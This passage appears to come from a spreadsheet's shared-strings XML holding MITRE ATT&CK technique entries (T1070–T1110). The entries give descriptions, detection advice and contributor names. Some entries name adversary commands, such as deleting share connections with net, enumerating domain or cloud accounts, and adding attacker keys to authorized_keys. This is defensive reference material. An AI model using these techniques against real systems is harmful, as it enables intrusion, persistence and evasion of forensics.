There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/004</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</si>
  <si>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</si>
  <si>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Walker Johnson</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Network Share Connection Removal</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/005</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</si>
  <si>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</si>
  <si>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Established network share connection to a remote system. Level of access depends on permissions of the account used.</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Timestomp</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/006</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</si>
  <si>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</si>
  <si>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Romain Dumont, ESET</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using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or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</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</si>
  <si>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</si>
  <si>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Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/001</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</si>
  <si>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</si>
  <si>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Application Layer Protocol: File Transfer Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>21 August 2020</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</si>
  <si>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</si>
  <si>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Application Layer Protocol: Mail Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>Application Layer Protocol: DNS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/004</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</si>
  <si>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</si>
  <si>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Jan Petrov, Citi</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).
Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>11 December 2020</t>
  </si>
  <si>
    <t>Execution, Lateral Movement</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</si>
  <si>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</si>
  <si>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Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory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location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074</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</si>
  <si>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</si>
  <si>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Praetorian; Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>13 March 2020</t>
  </si>
  <si>
    <t>26 May 2020</t>
  </si>
  <si>
    <t>Data Staged: Remote Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one system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
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>19 October 2021</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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</si>
  <si>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Jon Sternstein, Stern Security; Mark Wee; Netskope; Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Administrator, User</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Firewall, Host intrusion prevention systems, Network intrusion detection system, System access controls</t>
  </si>
  <si>
    <t>Valid Accounts: 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</si>
  <si>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Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>05 April 2021</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/002</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</si>
  <si>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On Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) 
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security</t>
  </si>
  <si>
    <t>Valid Accounts: Local Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t>Valid Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1080</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</si>
  <si>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t>
  </si>
  <si>
    <t>Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>David Routin; Michal Dida, ESET</t>
  </si>
  <si>
    <t>Access to shared folders and content with write permissions</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>13 October 2021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</si>
  <si>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</si>
  <si>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Maril Vernon @shewhohacks; Praetorian</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>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</si>
  <si>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Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087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</si>
  <si>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</si>
  <si>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Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; Microsoft Threat Intelligence Center (MSTIC); Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Account Discovery: Local Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>28 July 2021</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic</t>
  </si>
  <si>
    <t>Account Discovery: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/002</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</si>
  <si>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</si>
  <si>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Account Discovery: Email Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>31 March 2021</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, Windows</t>
  </si>
  <si>
    <t>Account Discovery: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>16 March 2021</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>30 August 2021</t>
  </si>
  <si>
    <t>3.1</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</si>
  <si>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</si>
  <si>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Heather Linn; Jon Sheedy; Walker Johnson</t>
  </si>
  <si>
    <t>Proxy: Internal Proxy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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/001</t>
  </si>
  <si>
    <t>14 March 2020</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</si>
  <si>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</si>
  <si>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Proxy: External Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to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to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/002</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</si>
  <si>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</si>
  <si>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Proxy: Multi-hop Proxy</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/003</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</si>
  <si>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</si>
  <si>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Proxy: Domain Fronting</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>16 September 2020</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Matt Kelly, @breakersall</t>
  </si>
  <si>
    <t>Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>20 July 2021</t>
  </si>
  <si>
    <t>Initial Access, Lateral Movement</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</si>
  <si>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</si>
  <si>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Removable media allowed, Autorun enabled or vulnerability present that allows for code execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>Adversaries may use a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 (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</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</si>
  <si>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</si>
  <si>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Ryan Becwar</t>
  </si>
  <si>
    <t>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In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>Persistence</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</si>
  <si>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t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian; Tim MalcomVetter</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/001</t>
  </si>
  <si>
    <t>19 January 2020</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</si>
  <si>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</si>
  <si>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Azure AD, IaaS</t>
  </si>
  <si>
    <t>Expel; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Account Manipulation: Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/002</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</si>
  <si>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</si>
  <si>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Office 365, Windows</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Microsoft Detection and Response Team (DART); Mike Burns, Mandiant; Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)</t>
  </si>
  <si>
    <t>Account Manipulation: Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Office 365</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Account Manipulation: SSH Authorized Keys</t>
  </si>
  <si>
    <t>Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>24 June 2020</t>
  </si>
  <si>
    <t>25 June 2020</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.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</si>
  <si>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https://attack.mitre.org/techniques/T1102</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</si>
  <si>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</si>
  <si>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Anastasios Pingios</t>
  </si>
  <si>
    <t>Web Service: Dead Drop Resolver</t>
  </si>
  <si>
    <t>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while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/001</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</si>
  <si>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</si>
  <si>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Web Service: Bidirectional Communication</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel.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</si>
  <si>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https://attack.mitre.org/techniques/T1102/002</t>
  </si>
  <si>
    <t>Web Service: One-Way Communication</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/003</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</si>
  <si>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User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</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</si>
  <si>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Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1104</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</si>
  <si>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</si>
  <si>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Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP,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</si>
  <si>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Native API functions (such as &lt;code&gt;NtCreateProcess&lt;/code&gt;) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: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While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</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</si>
  <si>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</si>
  <si>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Gordon Long, Box, Inc., @ethicalhax; Stefan Kanthak</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>30 September 2021</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</si>
  <si>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</si>
  <si>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Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Ed Williams, Trustwave, SpiderLabs; Magno Logan, @magnologan, Trend Micro; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Brute Force: Password Guessing</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>Brute Force: Password Cracking</t>
  </si>
  <si>
